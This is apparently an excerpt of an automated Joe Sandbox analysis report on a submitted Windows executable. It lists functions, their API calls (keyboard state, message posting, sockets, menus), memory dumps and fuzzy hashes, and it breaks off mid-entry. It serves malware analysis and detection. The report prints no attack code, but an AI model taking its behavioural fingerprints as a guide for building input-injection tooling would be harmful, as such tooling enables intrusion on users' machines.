                                                            Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                            • GetMenu.USER32 ref: 0047A703
                                                            • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                            • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                            • _wcslen.LIBCMT ref: 0047A79E
                                                            • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                            • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                            • String ID:
                                                            • API String ID: 3257027151-0
                                                            • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                            • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                            • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                            • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                            Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastselect
                                                            • String ID:
                                                            • API String ID: 215497628-0
                                                            • Opcode ID: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                            • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                            • Opcode Fuzzy Hash: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                            • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                            Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 0044443B
                                                            • GetKeyboardState.USER32(?), ref: 00444450
                                                            • SetKeyboardState.USER32(?), ref: 004444A4
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                            • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                            • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                            • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                            Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 00444633
                                                            • GetKeyboardState.USER32(?), ref: 00444648
                                                            • SetKeyboardState.USER32(?), ref: 0044469C
                                                            • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                            • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                            • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                            • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                            • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                            • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                            • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                            Function 0047DDC2 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 170COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __snwprintf__wcsicoll_wcscpy
                                                            • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                            • API String ID: 1729044348-3025626884
                                                            • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                            • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                                                            • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                            • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                                                            Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                            • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                            • String ID:
                                                            • API String ID: 2354583917-0
                                                            • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                            • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                            • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                            • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                            Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                            • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                            • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                            • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                            Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Enable$Show$MessageMoveSend
                                                            • String ID:
                                                            • API String ID: 896007046-0
                                                            • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                            • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                            • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                            • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                            Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                            • GetFocus.USER32 ref: 00448ACF
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Enable$Show$FocusMessageSend
                                                            • String ID:
                                                            • API String ID: 3429747543-0
                                                            • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                            • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                            • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                            • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                            Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                              • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                              • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                            • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 3300667738-0
                                                            • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                            • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                            • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                            • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                            Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                            • __swprintf.LIBCMT ref: 0045D4E9
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu$\VH
                                                            • API String ID: 3164766367-2432546070
                                                            • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                            • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                            • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                            • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                            Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                            • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                            • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 3850602802-3636473452
                                                            • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                            • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                            • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                            • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                            Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                            • String ID:
                                                            • API String ID: 3985565216-0
                                                            • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                            • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                            • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                            • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                            Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _malloc.LIBCMT ref: 0041F707
                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                            • _free.LIBCMT ref: 0041F71A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free_malloc
                                                            • String ID: [B
                                                            • API String ID: 1020059152-632041663
                                                            • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                            • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
